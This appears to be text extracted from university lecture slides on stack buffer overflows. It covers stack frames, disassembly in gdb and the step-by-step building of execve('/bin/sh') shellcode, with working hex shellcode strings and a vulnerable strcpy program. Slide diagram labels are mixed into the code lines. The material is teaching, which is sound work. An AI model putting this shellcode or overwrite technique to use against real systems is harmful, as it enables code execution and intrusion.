08 Buffer Overflow

Buffer Overflow
How to Propagate
• Buffer overflow attack against fingerd

• VAX systems spawned a new copy
• Sun systems (BSD) crashed
Buffer Overflow Attacks
10000000
10000000
1000000
500000
300000
100000
75000
10000
6000
1000
100
10
1
1988 2001 2003 2004 2008
Morris CodeRed SQL Slammer Sasser Conficker
Run-Time Memory Subdivision
memory top
Stack
Free Memory
Heap
Static
Code
memory bottom
Instruction Layout
label: instruction operands ; comment
• Intel syntax
• INSTR dest, src
• Used by NASM
• AT&T syntax
• INSTR src, dest
• Used by GAS
Stack Instructions
push arg
pop arg
Function Calls
call proc
Push EIP+4 onto the stack and jump
ret
Load the next value in the stack into EIP

Example
{ Caller
int a, b, c;
... param c
sum(a, b, c); param b
} param a
call foo, 3
...
Callee
int sum(int p1, int p2, int p3) foo:
{ t1 = p1 + p2
return p1+p2+p3; t1 = t1 + p3
} return t1
Example
previous frame pointer ebp
callee saved registers
Caller a
param c
b
param b
param a c
call foo, 3 stack temporaries
dynamic area
Callee esp
foo:
t1 = p1 + p2
t1 = t1 + p3 Before
return t1
Example
Caller a
param c
b
param b
param a c
dynamic area
Callee p3
p2
foo:
t1 = p1 + p2 p1
t1 = t1 + p3 esp
return t1
After param’s
Example
Caller a
param c
b
param b
param a c
dynamic area
Callee p3
p2
foo:
t1 = p1 + p2 p1
t1 = t1 + p3 return address
return t1
esp
After call foo, 3
Example
previous frame pointer
Caller a
param c
b
param b
param a c
dynamic area
Callee p3
p2
foo:
t1 = p1 + p2 p1
t1 = t1 + p3 return address
return t1 previous frame pointer ebp
t1
esp
Example
Caller callee saved registers
param c a ebp−8
param b
param a
b
call foo, 3 c
stack temporaries
dynamic area
p3
p2
push [ebp-16]
push [ebp-12] p1
push [ebp-8] return address
call foo
esp
After call foo, 3
Callee
foo:
t1 = p1 + p2
t1 = t1 + p3
previous frame pointer
return t1
a
b
push ebp c
mov esp,ebp stack temporaries
sub esp,8 dynamic area
mov edx,[ebp+8]
add edx,[ebp+12]
p3
add edx,[ebp+16] p2
mov [ebp-4],edx p1
mov eax,[ebp-4]
return address
mov esp,ebp
pop ebp previous frame pointer ebp
t1
Intel syntax esp
void function(int a, int b, int c) { pushl %ebp
char buffer1[5]; movl %esp,%ebp
char buffer2[10]; subl $20,%esp
}
pushl $3
void main() {
pushl $2
function(1,2,3);
pushl $1
}
call function
$ gcc -S -o example1.s example1.c AT&T syntax

caller’s frame
c
b
void function(int a, int b, int c) {
char buffer1[5]; a
char buffer2[10]; ret
}
sfp
void main() { buffer1
function(1,2,3);
}
buffer2
void function(char *str) {
char buffer[16]; caller’s frame
strcpy(buffer,str); str
}
ret
void main() { sfp
char large_string[256];
int i;
for( i = 0; i < 255; i++)

buffer
large_string[i] = 'A';
function(large_string);
}
caller’s frame
c
b
char buffer1[5]; a
char buffer2[10]; ret
}
sfp
void main() { buffer1
function(1,2,3);
}
buffer2
char buffer1[5]; caller’s frame
char buffer2[10]; c
int *ret;
b
ret = buffer1 + 12; a
(*ret) += 8; ret
}
sfp
void main() {
int x;
buffer1
x = 0;
function(1,2,3); buffer2
x = 1;
printf("%d\n",x);
}
$ gdb example3
(gdb) disassemble main
Dump of assembler code for function main:
0x8000490 <main>: pushl %ebp
0x8000491 <main+1>: movl %esp,%ebp
0x8000493 <main+3>: subl $0x4,%esp
0x8000496 <main+6>: movl $0x0,0xfffffffc(%ebp)
0x800049d <main+13>: pushl $0x3
0x800049f <main+15>: pushl $0x2
0x80004a1 <main+17>: pushl $0x1
0x80004a3 <main+19>: call 0x8000470 <function>
0x80004a8 <main+24>: addl $0xc,%esp
0x80004ab <main+27>: movl $0x1,0xfffffffc(%ebp)
0x80004b2 <main+34>: movl 0xfffffffc(%ebp),%eax
0x80004b5 <main+37>: pushl %eax
0x80004b6 <main+38>: pushl $0x80004f8
0x80004bb <main+43>: call 0x8000378 <printf>
0x80004c0 <main+48>: addl $0x8,%esp
0x80004c3 <main+51>: movl %ebp,%esp
0x80004c5 <main+53>: popl %ebp
0x80004c6 <main+54>: ret
0x80004c7 <main+55>: nop
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}

0x8000493 <main+3>: subl $0x4,%esp
0x8000496 <main+6>: movl $0x0,0xfffffffc(%ebp)
0x800049d <main+13>: pushl $0x3
0x800049f <main+15>: pushl $0x2
0x80004a1 <main+17>: pushl $0x1
0x80004a3 <main+19>: call 0x8000470 <function>
0x80004a8 <main+24>: addl $0xc,%esp
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
0x80004ab <main+27>: movl $0x1,0xfffffffc(%ebp)

0x80004b2 <main+34>: movl 0xfffffffc(%ebp),%eax
0x80004b5 <main+37>: pushl %eax
0x80004b6 <main+38>: pushl $0x80004f8
0x80004bb <main+43>: call 0x8000378 <printf>
0x80004c0 <main+48>: addl $0x8,%esp
0x80004c3 <main+51>: movl %ebp,%esp
0x80004c5 <main+53>: popl %ebp
0x80004c6 <main+54>: ret
0x80004c7 <main+55>: nop
caller’s frame
str
void main(int argc, char *argv[]) { ret
char buffer[512];
sfp
if (argc > 1)
strcpy(buffer,argv[1]);
} buffer
Spawning a Shell
sfp
#include <stdio.h>
name[1]
void main() { name[0]
char *name[2];
name[0] = "/bin/sh"; Free memory

name[1] = NULL;
execve(name[0], name, NULL);
}
“/bin/sh”
sfp
#include <stdio.h> ebp
name[1]
char *name[2];

name[1] = NULL;
} “/bin/sh”

0x8000133 <main+3>: subl $0x8,%esp
0x8000136 <main+6>: movl $0x80027b8,0xfffffff8(%ebp)
0x800013d <main+13>: movl $0x0,0xfffffffc(%ebp)
sfp
#include <stdio.h> ebp
name[1]
char *name[2]; name
name[1] = NULL;
} “/bin/sh”
0x8000144 <main+20>: pushl $0x0

0x8000146 <main+22>: leal 0xfffffff8(%ebp),%eax
0x8000149 <main+25>: pushl %eax
0x800014a <main+26>: movl 0xfffffff8(%ebp),%eax
0x800014d <main+29>: pushl %eax
0x800014e <main+30>: call 0x80002bc <__execve>
0x8000153 <main+35>: addl $0xc,%esp
0x8000156 <main+38>: movl %ebp,%esp
0x8000158 <main+40>: popl %ebp
0x8000159 <main+41>: ret
#include <stdio.h>
NULL
void main() {
name
char *name[2];
name[0]
name[0] = "/bin/sh"; ret
name[1] = NULL;
execve(name[0], name, NULL); sfp
} ebp
(gdb) disassemble __execve

Dump of assembler code for function __execve:
0x80002bc <__execve>: pushl %ebp
Syscall index
0x80002bd <__execve+1>: movl %esp,%ebp
0x80002bf <__execve+3>: pushl %ebx
0x80002c0 <__execve+4>: movl $0xb,%eax
0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx
0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx
0x80002cb <__execve+15>: movl 0x10(%ebp),%edx
0x80002ce <__execve+18>: int $0x80
...
#include <stdlib.h>
void main() {
exit(0);
}
(gdb) disassemble _exit

Dump of assembler code for function _exit:
0x800034c <_exit>: pushl %ebp
0x800034d <_exit+1>: movl %esp,%ebp
0x800034f <_exit+3>: pushl %ebx
0x8000350 <_exit+4>: movl $0x1,%eax
0x8000355 <_exit+9>: movl 0x8(%ebp),%ebx
0x8000358 <_exit+12>: int $0x80
0x800035a <_exit+14>: movl 0xfffffffc(%ebp),%ebx
0x800035d <_exit+17>: movl %ebp,%esp
0x800035f <_exit+19>: popl %ebp
0x8000360 <_exit+20>: ret
char *name[2];
name[0] = "/bin/sh"; NULL

name[1] = NULL;
execve(name[0], name, NULL); name[0]
exit(0);
movl string_addr,string_addr_addr
“/bin/sh”
movb $0x0,null_byte_addr
movl $0x0,null_addr
movl $0xb,%eax Call exit
movl string_addr,%ebx Call execve
leal string_addr,%ecx
leal null_string,%edx
int $0x80
movl $0x1, %eax
movl $0x0, %ebx
int $0x80
/bin/sh string goes here.
jmp offset-to-call # 2 bytes
popl %esi # 1 byte caller’s frame
movl %esi,array-offset(%esi) # 3 bytes
movb $0x0,nullbyteoffset(%esi)# 4 bytes ret
movl $0x0,null-offset(%esi) # 7 bytes
movl $0xb,%eax # 5 bytes
movl %esi,%ebx # 2 bytes
leal array-offset,(%esi),%ecx # 3 bytes
leal null-offset(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
movl $0x1, %eax # 5 bytes
movl $0x0, %ebx # 5 bytes
int $0x80 # 2 bytes
call offset-to-popl # 5 bytes
/bin/sh string goes here.
jmp 0x26 # 2 bytes
popl %esi # 1 byte
movb $0x0,nullbyteoffset(%esi)# 4 bytes
int $0x80 # 2 bytes
int $0x80 # 2 bytes
call -0x2b # 5 bytes
.string \”/bin/sh\”
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46"
"\x07\x00\xc7\x46\x0c\x00\x00\x00" caller’s frame
"\x00\xb8\x0b\x00\x00\x00\x89\xf3"
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" ret
"\xb8\x01\x00\x00\x00\xbb\x00\x00"
"\x00\x00\xcd\x80\xe8\xd1\xff\xff"
sfp
"\xff\x2f\x62\x69\x6e\x2f\x73\x68"
c
"\x00\x89\xec\x5d\xc3";
void main() {
int *c;
shellcode
c = (int *)&c + 2;
(*c) = (int)shellcode;
}
void main() {
__asm__("
jmp 0x2a # 3 bytes
popl %esi # 1 byte
...
call -0x2f # 5 bytes
.string \"/bin/sh\" # 8 bytes
");
}
0x8000133 <main+3>: jmp 0x800015f <main+47>
...
End of assembler dump.
(gdb) x/bx main+3
0x8000133 <main+3>: 0xeb
(gdb)
0x8000134 <main+4>: 0x2a
(gdb)
...
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46"
"\x07\x00\xc7\x46\x0c\x00\x00\x00" caller’s frame
"\x00\xb8\x0b\x00\x00\x00\x89\xf3"
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" ret
"\xb8\x01\x00\x00\x00\xbb\x00\x00"
"\x00\x00\xcd\x80\xe8\xd1\xff\xff"
sfp
"\xff\x2f\x62\x69\x6e\x2f\x73\x68"
c
"\x00\x89\xec\x5d\xc3";
void main() {
int *c;
shellcode
c = (int *)&c + 2;
(*c) = (int)shellcode;
}
void main(int argc, char *argv[]) {
char buffer[512];
if (argc > 1)
strcpy(buffer,argv[1]);
}
jmp 0x26 # 2 bytes

popl %esi # 1 byte
movb $0x0,nullbyteoffset(%esi)# 4 bytes
int $0x80 # 2 bytes
int $0x80 # 2 bytes
call -0x2b # 5 bytes
.string \”/bin/sh\”
xorl %eax,%eax
movb $0x0,0x7(%esi)
movb %eax,0x7(%esi)
movl $0xb,%eax movb $0xb,%al
xorl %ebx,%ebx
movl $0x1, %eax
movl %ebx,%eax
movl $0x0, %ebx
inc %eax
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
caller’s frame
"\x88\x46\x07\x89\x46\x0c\xb0\x0b" ret
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd" sfp
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
local storage
void main() {
int *ret; buffer
ret = (int *)&ret + 2; local storage

(*ret) = (int)shellcode;
}
void main(int argc, char *argv[]) { Address of “ret”?

char buffer[512];
if (argc > 1)
strcpy(buffer,argv[1]); Address of “buffer”?
}

08 Buffer Overflow

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

08 Buffer Overflow

Uploaded by

Copyright:

Available Formats

Buffer Overflow

• Buffer overflow attack against fingerd

Push EIP+4 onto the stack and jump

Load the next value in the stack into EIP

$ gcc -S -o example1.s example1.c AT&T syntax

for( i = 0; i < 255; i++)

0x8000490 <main>: pushl %ebp

0x80004ab <main+27>: movl $0x1,0xfffffffc(%ebp)

name[0] = "/bin/sh"; Free memory

name[0] = "/bin/sh"; Free memory

(gdb) disassemble main

0x8000144 <main+20>: pushl $0x0

(gdb) disassemble __execve

(gdb) disassemble _exit

name[0] = "/bin/sh"; NULL

jmp 0x26 # 2 bytes

movl $0xb,%eax movb $0xb,%al

ret = (int *)&ret + 2; local storage

void main(int argc, char *argv[]) { Address of “ret”?

You might also like